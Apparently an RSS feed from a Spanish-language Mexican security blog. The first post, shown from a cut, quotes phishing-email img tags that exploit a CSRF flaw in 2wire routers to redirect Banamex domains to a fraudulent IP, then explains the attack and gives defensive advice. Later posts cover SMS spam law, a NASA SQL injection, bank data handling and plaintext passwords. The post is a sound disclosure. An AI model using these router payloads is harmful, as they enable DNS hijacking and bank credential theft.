<p><code> &lt;img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp; NEXTPAGE=J38_SET&amp;NAME=banamex.com&amp;ADDR=[IPDELSITIOFRAUDULENTO] "&gt;<br />&lt;img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp; NEXTPAGE=J38_SET&amp;NAME=www.banamex.com&amp;ADDR=[IPDELSITIOFRAUDULENTO] "&gt;<br />&lt;img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp; NEXTPAGE=J38_SET&amp;NAME=banamex.com.mx&amp;ADDR=[IPDELSITIOFRAUDULENTO] "&gt;<br />&lt;img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp; NEXTPAGE=J38_SET&amp;NAME=www.banamex.com.mx&amp;ADDR=[IPDELSITIOFRAUDULENTO] "&gt;<br />&lt;img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp; NEXTPAGE=J38_SET&amp;NAME=www.bancanetempresarial.banamex.com.mx&amp;ADDR=[IPDELSITIOFRAUDULENTO] "&gt;<br />&lt;img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp; NEXTPAGE=J38_SET&amp;NAME=bancanetempresarial.banamex.com.mx&amp;ADDR=[IPDELSITIOFRAUDULENTO] "&gt;<br />&lt;img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp; NEXTPAGE=J38_SET&amp;NAME=boveda.banamex.com&amp;ADDR=[IPDELSITIOFRAUDULENTO] "&gt;</code>
<p>&nbsp;</p>
<p>Entre otras lineas similares. Estas lineas hacen uso de una vulnerabilidad&nbsp;de tipo <a href="http://en.wikipedia.org/wiki/Cross-site_request_forgery">CSRF</a> de los routers 2wire inalambricos que son los que telmex regala a sus suscriptores de infinitum. </p>
<p>Lo que esta vulnerabilidad provoca, es que hace un cambio a los dns del router (AFAIK, no tengo un modem 2wire para probar ahora mismo)&nbsp; para que cada vez que alguien accese a la banca en linea de banamex, en realidad entres al sitio fraudulento. Basicamente usa la CSRF para&nbsp;realizar un <a href="http://es.wikipedia.org/wiki/DNS_Poisoning">DNS poisoning.</a>&nbsp;Y ni tu navegador, ni tu antivirus, ni tu firewall se darian cuenta. Seria transparante para el usuario. </p>
<p>Esta vulnerabilidad es especialmente peligrosa porque no es necesario que el usuario ejecute ningun archivo, ni que baje nada. Simplemente entrando a la pagina o si su lector de correo muestra la imagen, el daño estaria hecho.</p>
<p>Como siempre, se recomienda que no abran correos que no estan esperando&nbsp;o de gente que no conozcan y usen un cliente de correo decente como thunderbird, que avisa cuando el texto del enlace no coincide con el enlace mismo. Ademas cambiene la contraseña a su router, revisen periodicamente su configuracion o de plano cambien de router. Con esta vulnerabilidad se puede cambiar toda la configuracion del router. Desde cambiar la contraseña de administrador, activar o desactivar el wireless, activar o desactivar el firewall, etc. </p>
<p>Mas informacion de la vulnerabilidad aqui: <a title="http://securityreason.com/securityalert/3026" href="http://securityreason.com/securityalert/3026">http://securityreason.com/securityalert/3026</a></p>
<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://www.masio.com.mx/nuevo-tipo-de-phishing-ataca-a-clientes-de-prodigy-infinitum/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Telcel y el SPAM</title>
		<link>http://www.masio.com.mx/telcel-y-el-spam</link>
		<comments>http://www.masio.com.mx/telcel-y-el-spam#comments</comments>
		<pubDate>Thu, 02 Aug 2007 20:12:48 +0000</pubDate>
		<dc:creator>Masiosare</dc:creator>
				<category><![CDATA[mexico]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.masio.com.mx/telcel-y-el-spam/es/</guid>
		<description><![CDATA[Al parecer, de un tiempo para aca, Telcel esta teniendo la mala mania de enviar mensajes no solicitados a algunos numeros de celular. Por ejemplo: &#160; &#160; El envio de estos mensajes es simple y llanamente SPAM. Segun wikipeda: Spam son mensajes no solicitados, habitualmente de tipo publicitario, enviados en cantidades masivas que perjudican de [...]
Related posts:<ol>
<li><a href='http://www.masio.com.mx/proteccion-de-los-datos-personales-en-mexico-o-di-no-al-spam' rel='bookmark' title='Proteccion de los datos personales en mexico (o di no al spam :) )'>Proteccion de los datos personales en mexico (o di no al spam :) )</a></li>
<li><a href='http://www.masio.com.mx/robo-de-cuentas-bancarias-y-el-status-en-mexico' rel='bookmark' title='Robo de cuentas bancarias y el status en mexico'>Robo de cuentas bancarias y el status en mexico</a></li>
<li><a href='http://www.masio.com.mx/iphone-y-los-altisimos-precios-de-internet-en-telcel' rel='bookmark' title='iPhone y los altisimos precios de internet en telcel'>iPhone y los altisimos precios de internet en telcel</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Al parecer, de un tiempo para aca, Telcel esta teniendo la mala mania de enviar mensajes no solicitados a algunos numeros de celular. Por ejemplo:</p>
<table width="80%" cellspacing="5" cellpadding="1" border="0" align="center">
<tbody>
<tr>
<td align="center"><img width="240" height="320" alt="" src="http://www.masio.com.mx/masio/wp-content/uploads/image/spam2(1).png" /></td>
<td align="center"><img width="240" height="320" alt="" src="http://www.masio.com.mx/masio/wp-content/uploads/image/telcelspam.png" /></td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
</tbody>
</table>
<p>El envio de estos mensajes es simple y llanamente SPAM. Segun wikipeda:</p>
<p><em><strong>Spam</strong> son mensajes no solicitados, habitualmente de tipo publicitario, enviados en cantidades masivas que perjudican de una u otra manera al receptor. Aunque se puede hacer por distintas v&iacute;as, la m&aacute;s utilizada entre el p&uacute;blico en general es la basada en el correo electr&oacute;nico. Otras tecnolog&iacute;as de internet que han sido objeto de correo basura incluyen grupos de noticias usenet, motores de b&uacute;squeda, wikis, foros y blogs. El correo basura tambi&eacute;n puede tener como objetivo los tel&eacute;fonos m&oacute;viles (a trav&eacute;s de mensajes de texto) y los sistemas de mensajer&iacute;a instant&aacute;nea.</em></p>
<p>Es algo que se debe denunciar energicamente. Si hoy no lo hacemos, que le impide a telcel en vender la base de datos de usuarios a una compa&ntilde;ia de publicidad? O ellos mismos empezar a hacer el servicio de telemercadeo con una base de mas de 40 millones de usuarios?</p>
<p>&iquest;Que se puede hacer contra esto (y contra el spam en general)?</p>
<p>1. Pedir a telcel por un medio formal (un correo electronico basta) que no deseas recibir mensajes no solicitados. (ya veran porque)</p>
<p>2. Ya hace <a href="http://www.masio.com.mx/proteccion-de-los-datos-personales-en-mexico-o-di-no-al-spam/es/">tiempo hable </a>de una posible ley que estaban promoviendo la condusef y la profeco sobre la proteccion de datos personales, que al parecer no paso mucho con ella. Sin embargo ya hay una ley que nos protege. Especificamente la <a href="http://www.profeco.gob.mx/juridico/word/l_lfpc_06062006.doc">ley federal de proteccion al consumidor</a> que dice en sus articulo VII Bis lo siguiente:</p>
<div>
<p><em><span lang="es-ES" style="font-weight: bold; font-size: 10pt; font-family: 'Arial';">I.</span><span lang="es-ES" style="font-size: 10pt; font-family: 'Arial';"> El proveedor utilizar&aacute; la informaci&oacute;n proporcionada por el consumidor en forma confidencial, por lo que no podr&aacute; difundirla o transmitirla a otros proveedores ajenos a la transacci&oacute;n, salvo autorizaci&oacute;n expresa del propio consumidor o por requerimiento de autoridad competente; </span></em></p>
</div>
<p><em><span lang="es-ES" style="font-size: 10pt;"> </span></em></p>
<p><em><span lang="es-ES" style="font-weight: bold; font-size: 10pt;">VI.</span><span lang="es-ES" style="font-size: 10pt;"> El proveedor respetar&aacute; la decisi&oacute;n del consumidor en cuanto a la cantidad y calidad de los productos que desea recibir, as&iacute; como la de no recibir avisos comerciales<br />
</span></em></p>
<p><font size="4">Es decir, <strong>ES ILEGAL ENVIAR MENSAJES NO SOLICITADOS</strong>. El spam, desde <strong>2004 (fecha en la que se hizo esta reforma), es ILEGAL en Mexico.</strong></font></p>
<p>3. En caso de que la compa&ntilde;ia no cumpla con una solicitud para no recibir mensajes no solicitados, se debe denunciar ante la PROFECO que esta obligada a dar seguimiento a la queja y en su caso, resolverla. En caso de proceder la queja, el infractor podria recibir una multa de entre <font size="4"><u> $479.17 a $1&rsquo;874,091.79</u> </font>la segun el articulo 128 de la misma ley.&nbsp;</p>
<p><a href="http://www.profeco.gob.mx/ecomercio/spam/spam.asp">En esta pagina</a>, la PROFECO provee de mas informacion sobre que es el spam y como combatirlo. Y <a href="http://www.profeco.gob.mx/consumidor/denuncias1.asp">aqui hay informacion de como levantar la denuncia</a>.</p>
<p>La denuncia es una de las pocas armas que tenemos los ciudadanos contra este tipo de practicas abusivas. Hay que hacer valer ese derecho.&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>Related posts:<ol>
<li><a href='http://www.masio.com.mx/proteccion-de-los-datos-personales-en-mexico-o-di-no-al-spam' rel='bookmark' title='Proteccion de los datos personales en mexico (o di no al spam :) )'>Proteccion de los datos personales en mexico (o di no al spam :) )</a></li>
<li><a href='http://www.masio.com.mx/robo-de-cuentas-bancarias-y-el-status-en-mexico' rel='bookmark' title='Robo de cuentas bancarias y el status en mexico'>Robo de cuentas bancarias y el status en mexico</a></li>
<li><a href='http://www.masio.com.mx/iphone-y-los-altisimos-precios-de-internet-en-telcel' rel='bookmark' title='iPhone y los altisimos precios de internet en telcel'>iPhone y los altisimos precios de internet en telcel</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.masio.com.mx/telcel-y-el-spam/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Sql Inyection en Nasa</title>
		<link>http://www.masio.com.mx/sql-inyection-en-nasa</link>
		<comments>http://www.masio.com.mx/sql-inyection-en-nasa#comments</comments>
		<pubDate>Thu, 10 May 2007 02:24:57 +0000</pubDate>
		<dc:creator>Masiosare</dc:creator>
				<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.masio.com.mx/2007/05/09/sql-inyection-en-nasa/</guid>
		<description><![CDATA[Michoacano me paso el tip. http://www.michoacano.com.mx/2007/05/10/%c2%bfsql-injection-en-la-pagina-de-la-nasa/ La pagina de la nasa, en especial la dedicada al cambio climatico tiene un error de novatos de inyeccion de sql. Para los que piensan que aventando dinero a un problema lo soluciona, este es el ejemplo de que no. A final de cuentas, los que ejecutan las ordenes [...]
No related posts.]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.michoacano.com.mx">Michoacano </a>me paso el tip.</p>
<p><a href="http://www.michoacano.com.mx/2007/05/10/%c2%bfsql-injection-en-la-pagina-de-la-nasa/">http://www.michoacano.com.mx/2007/05/10/%c2%bfsql-injection-en-la-pagina-de-la-nasa/</a></p>
<p>La pagina de la nasa, en especial la dedicada al cambio climatico tiene un error de novatos de inyeccion de sql.</p>
<p>Para los que piensan que aventando  dinero a un problema lo soluciona, este es el ejemplo de que no. A final de cuentas, los que ejecutan las ordenes son personas comunes y corrientes, que cometen errores.</p>
<p>Las organizaciones sirven para evitar que se cometan errores, pero tienen un defecto: esta compuesta de personas.</p>
<p>Aqui les dejo un screenshot del problema. Y como bien dice Julio (michoacano): A ver quien es el guapo que le hace algo a la pagina de la nasa.</p>
<p><a href="http://www.masio.com.mx/wp-content/uploads/2007/05/nasasql.jpg" title="nasasql.JPG"></a></p>
<p style="text-align: center"><a href="http://www.masio.com.mx/wp-content/uploads/2007/05/nasasql.jpg" title="nasasql.JPG"><img src="http://www.masio.com.mx/wp-content/uploads/2007/05/nasasql-150x150.jpg" alt="nasasql.JPG" /></a></p>
<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://www.masio.com.mx/sql-inyection-en-nasa/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Robo de cuentas bancarias y el status en mexico</title>
		<link>http://www.masio.com.mx/robo-de-cuentas-bancarias-y-el-status-en-mexico</link>
		<comments>http://www.masio.com.mx/robo-de-cuentas-bancarias-y-el-status-en-mexico#comments</comments>
		<pubDate>Fri, 30 Mar 2007 23:19:06 +0000</pubDate>
		<dc:creator>Masiosare</dc:creator>
				<category><![CDATA[actualidad]]></category>
		<category><![CDATA[mexico]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.masio.com.mx/2007/03/30/robo-de-cuentas-bancarias-y-el-status-en-mexico/es/</guid>
		<description><![CDATA[Hoy Ars-Tecnica publica un articulo en el que describen el mayor robo de cuentas bancarias de la historia. Se trata del robo de POR LO MENOS 45 millones de numeros de tarjetas de credito a la empresa T.J. Maxx. Se cree que el numero es MUCHO mas grande. No solo se robaron datos bancarios, sino [...]
Related posts:<ol>
<li><a href='http://www.masio.com.mx/reddit-seguridad-y-robo-de-contrasenas' rel='bookmark' title='Reddit, seguridad y robo de contrase&#241;as'>Reddit, seguridad y robo de contrase&#241;as</a></li>
<li><a href='http://www.masio.com.mx/proteccion-de-los-datos-personales-en-mexico-o-di-no-al-spam' rel='bookmark' title='Proteccion de los datos personales en mexico (o di no al spam :) )'>Proteccion de los datos personales en mexico (o di no al spam :) )</a></li>
<li><a href='http://www.masio.com.mx/las-disqueras-reculan-un-poco' rel='bookmark' title='Las disqueras reculan (un poco)'>Las disqueras reculan (un poco)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Hoy <a href="http://arstechnica.com/news.ars/post/20070330-tjx-consumer-data-theft-largest-in-history.html">Ars-Tecnica</a> publica un articulo en el que describen el mayor robo de cuentas bancarias de la historia. Se trata del robo de <em>POR LO MENOS </em>45 millones de numeros de tarjetas de credito a la empresa T.J. Maxx. Se cree que el numero es MUCHO mas grande. No solo se robaron datos bancarios, sino tambien personales, lo cual hace aun mas grave el robo.</p>
<p>Al parecer hackers (esos benditos entes amorfos que se presentan en cada problema con algun sistem informatico) instalaron sistemas que robaban los datos de dicha empresa. Lo curioso es que paso mas de un a&ntilde;o sin que nadie se diera cuenta de dichos&nbsp;sistemas.</p>
<p>Pero que hay de mexico? Hace tiempo la comision bancaria y de valores pidio a los bancos sistemas de seguridad para el acceso a la banca por via electronica, los famosos candados o netkeys o las tarjetas de acceso seguro. Es un buen paso, sin embargo es como poner una reja electrificada en una casa que el switch electrico a la mano de todos. </p>
<p>Â¿Porque digo esto?. Conozco de primera mano como se llevan los procesos internos en varios bancos (los cuales no nombrare) y el manejo&nbsp;de la informacion, es por decirlo menos, lamentable. Al dia de hoy, los empleados que trabajan en oficinas centrales pueden acceder a millones de cuentas, bajarlas a un disco en excel y llevarselas en un disco a su casa. Digo esto porque LO HE VISTO. He visto las memorias usb llenas de archivos de excel con numeros de cuentas y los propietarios (empleados del banco) solo dicen &#8220;no las vayas a copiar, esa usb vale millones de pesos&#8221; (je je!). Al dia de hoy no hay el mas minimo cuidado de la informacion de la persona.</p>
<p>Hace tiempo <a href="http://www.masio.com.mx/2006/10/31/proteccion-de-los-datos-personales-en-mexico-o-di-no-al-spam/es/">reporte de una iniciativa de ley</a>&nbsp;&nbsp;para la proteccion de los datos personales. Sin embargo esta aun no se ha&nbsp;aprobado &nbsp;y no hay visos de que asi vaya a ser. </p>
<p>En mexico estamos terriblemente expuestos a que alguien realice un fraude con nuestro numero de tarjeta y los bancos te tratan primero como sospechoso que como usuario. </p>
<p>Es triste saber que poco podemos hacer, fuera de lo que ya hacemos, no esta en nuestras manos. Talvez lo unico que podamos hacer es gritar, hacer que nos escuchen, hacer mas articulos como estos, hacer ruido. Ojala que los responsables de esto, bancos y gobierno nos escuchen. El balon esta en su cancha.  </p>
<p>Related posts:<ol>
<li><a href='http://www.masio.com.mx/reddit-seguridad-y-robo-de-contrasenas' rel='bookmark' title='Reddit, seguridad y robo de contrase&#241;as'>Reddit, seguridad y robo de contrase&#241;as</a></li>
<li><a href='http://www.masio.com.mx/proteccion-de-los-datos-personales-en-mexico-o-di-no-al-spam' rel='bookmark' title='Proteccion de los datos personales en mexico (o di no al spam :) )'>Proteccion de los datos personales en mexico (o di no al spam :) )</a></li>
<li><a href='http://www.masio.com.mx/las-disqueras-reculan-un-poco' rel='bookmark' title='Las disqueras reculan (un poco)'>Las disqueras reculan (un poco)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.masio.com.mx/robo-de-cuentas-bancarias-y-el-status-en-mexico/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Reddit, seguridad y robo de contrase&#241;as</title>
		<link>http://www.masio.com.mx/reddit-seguridad-y-robo-de-contrasenas</link>
		<comments>http://www.masio.com.mx/reddit-seguridad-y-robo-de-contrasenas#comments</comments>
		<pubDate>Fri, 15 Dec 2006 20:26:50 +0000</pubDate>
		<dc:creator>Masiosare</dc:creator>
				<category><![CDATA[programacion]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.masio.com.mx/2006/12/15/reddit-seguridad-y-robo-de-contrasenas/es/</guid>
		<description><![CDATA[Si alguien es usuario asiduo de Reddit talvez noto que hubo fallas en los servidores en esta semana. Ayer los programadores de reddit ofrecieron una disculpa por las fallas, pero revelaron otra cosa mucho mas interesante. Al parecer una parte de un respaldo de la base de datos de reddit fue robado y con el [...]
No related posts.]]></description>
			<content:encoded><![CDATA[<p>Si alguien es usuario asiduo de <a href="http://reddit.com/">Reddit</a> talvez noto que hubo fallas en los servidores en esta semana. Ayer los programadores de reddit ofrecieron una <a href="http://reddit.com/blog/theft">disculpa por las fallas</a>, pero revelaron otra cosa mucho mas interesante. Al parecer una parte de un respaldo de la base de datos de reddit fue robado y con el muchos nombres de usuario y contrase&ntilde;a.</p>
<p>Esto es sospechoso por dos motivos.</p>
<ol>
<li>Usualmente un respaldo de una base de datos no se hace en partes a menos que sea enooooooorme, del orden de muchos GB o TB. Y reddit no tiene tanto tiempo de activo, y solo guarda peque&ntilde;os datos tipo texto por registro, aunque por supuesto, podria estar terriblemente equivocado <img src='http://www.masio.com.mx/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </li>
<li>Segundo, y mucho mucho mas importante. Si es posible que hayan robado usuarios y contrase&ntilde;as quiere decir que estos estaban almacenados en texto plano.
</ol>
<p>Aqui es donde las alarmas se encienden. Este es un error super basico en el desarrollo de aplicacione seguras (y que yo cometi cuando empece, debo aceptar <img src='http://www.masio.com.mx/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> ). NUNCA NUNCA NUNCA (y repito, NUNCA) guardes contrase&ntilde;as en texto plano.</p>
<p>Es muy sencillo implementar el guardado de contrase&ntilde;as mediante un hash + salt. El que no sepa, que pregunte. (si alguien lo requiere puedo poner un articulo al respecto)</p>
<p>Una vez que alguien se haga de las contrase&ntilde;as de la base de datos, toda tu aplicacion estara abierta. Si tu crees que eres invulnerable o que tu sistema no le importa a los hackers, piensalo dos veces. En el caso de reddit tienen informacion privada, como correos electronicos. Una vez que tienen la contrase&ntilde;a, pueden intentar ingresar a esos correos con la misma contrase&ntilde;a y de ahi saltar hasta a servicios bancarios (lo cual es una razon mas para no guardar tus contrase&ntilde;as en el correo electronico <img src='http://www.masio.com.mx/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> ). En tu caso puede ser informacion aun mas sensible como informacion bancaria, nombres, direcciones, telefonos u otra informacion que permita identificar a tus usuarios. Teniendo esta informacion, para los hackers solo les falta un paso al cielo&#8230; y a sus cuentas bancarias, o peor&#8230;</p>
<p>Si valoras a tus usuarios (y a tu integridad fisica y economica), documentate por lo menos de los tips minimos de seguridad. O atente a las consecuencias.</p>
<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://www.masio.com.mx/reddit-seguridad-y-robo-de-contrasenas/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

